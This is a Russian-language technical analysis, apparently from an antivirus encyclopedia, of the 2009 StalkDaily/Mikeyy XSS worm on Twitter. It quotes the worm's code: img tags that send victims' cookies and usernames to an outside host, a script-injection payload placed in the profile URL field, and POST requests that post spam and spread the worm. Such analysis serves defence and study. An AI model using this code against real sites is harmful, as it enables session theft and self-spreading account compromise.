Технические детали
Семейство XSS-червей, распространявшихся в социальной сети Twitter в апреле 2009 года. Для своего размножения использовали XSS-уязвимости и были созданы 17-и летним американцем Michael "Mikeyy" Mooney.
Червь использовал уязвимости в программном обеспечении Twitter, позволявшие производить атаки типа «межсайтовый скриптинг» (XSS) и модифицировать страницы учётных записей пользователей. Заражение происходило при посещении модифицированной страницы на сайте Twitter, или при переходе по гиперссылке в поддельном сообщении, присланном от имени участника Twitter. При этом исполнялся вредоносный сценарий JavaScript.
Основной функционал червей содержится в трех функциях:
- XHConn – использует стандартную функцию XMLHttpRequest() для ajax-вызовов;
- Urlencode – использует стандартную функцию encodeURIComponent() для кодировки URI;
- Wait – содержит вредоносный функционал.
Net-Worm.JS.Twettir.d использует XSS-уязвимость в обработке тега img:
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'/>");
В скрипт x.php передаются параметры cookies и username текущего пользователя.
После того, как атакуемый пользователь посетил вредоносную ссылку, червь начинает отправлять с его аккаунта в Twitter-е следующие сообщения (так же содержащие вредоносную ссылку):
"Twitter has been hacked !!!
http://www.stalkdaily.com/member/?TWITTERHACKED&TWITTERHACKED&TWITTERHACKED&TWITTERHACKED";
Twitter worm, read here
http://www.stalkdaily.com/member/?TWITTERHACKED&TWITTERHACKED&TWITTERHACKED&TWITTERHACKED";
StalkDaily worm on Twitter, more info
http://www.stalkdaily.com/member/?TWITTERHACKED&TWITTERHACKED&TWITTERHACKED&TWITTERHACKED";
http://www.stalkdaily.com/member/?TWITTERHACKED&TWITTERHACKED&TWITTERHACKED&TWITTERHACKED HOWTO: Remove StalkDaily.com Auto-Tweets From Your Infected Twitter Profile | Twittercism";
"#Stalkdaily virus runs riots on twitter. Learn how to remove it
http://www.stalkdaily.com/member/?TWITTERHACKED&TWITTERHACKED&TWITTERHACKED&TTERHACKED";
Также из данных сообщений произвольным образом выбирается одно, которое будет отображаться в профиле у зараженного пользователя.
Часть кода червя, в которой происходит изменение параметров пользователя посредством POST-запросов:
var xss = urlencode('http://www.stalkdaily.com"> <script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
var ajaxConn = new XHConn();
ajaxConn.connect("/status/update ", "POST",
"authenticity_token="+authtoken+"&status="+updateEncode +"&tab=home&update=update");
var ajaxConn1 = new XHConn();
ajaxConn1.connect("/account/settings ", "POST",
"authenticity_token="+authtoken+"&user[url]="+ xss +"&tab=home&update=update");
В последнем POST-запросе с помощью изменения параметра user[url] на страницу пользователя включается ссылка на зловредный скрипт.
Таким образом, все пользователи, посетившие зараженную страницу другого пользователя с уже добавленным скриптом, инициируют выполнение червя у себя. Это, в свою очередь, приводит к рассылке нового сообщения от их имени и добавлению зловредного скрипта к их странице.
RSS-каналы
